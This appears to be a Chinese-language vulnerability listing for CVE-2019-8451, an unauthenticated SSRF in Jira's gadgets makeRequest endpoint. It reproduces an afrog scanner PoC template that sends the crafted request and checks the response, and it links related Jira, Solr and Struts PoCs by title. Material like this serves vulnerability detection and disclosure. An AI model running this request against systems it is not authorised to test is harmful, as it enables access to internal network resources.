CVE-2019-8451: Jira SSRF

日期: 2025-09-01 | 影响软件: Jira | POC: 已公开

漏洞描述

Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞，原因在于JiraWhitelist这个类的逻辑缺陷，成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析，此漏洞无需任何凭据即可触发。

PoC代码[已公开]

id: CVE-2019-8451

info:
    name: Jira SSRF
    author: zan8in
    severity: medium
    description: "Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞，原因在于JiraWhitelist这个类的逻辑缺陷，成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析，此漏洞无需任何凭据即可触发。"
    reference:
        - https://github.com/jas502n/CVE-2019-8451
        - https://www.cnblogs.com/backlion/p/11608371.html

transport: http
set:
    originScheme: request.url.scheme
    originHost: request.url.host
rules:
    r0:
        request:
            method: GET
            path: /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@example.com/
            headers:
                X-Atlassian-Token: no-check
        expression: response.status == 200 && response.body.bcontains(b'Example Domain')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2019/CVE-2019-8451.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2019-11581: Atlassian Jira未授权服务端模板注入漏洞 POC

CVE-2019-8442: Atlassian Jira webroot leak POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2019-0193: Apache Solr Remote Code Execution POC

CVE-2019-0230: Apache Struts <=2.5.20 - Remote Code Execution S2-059 POC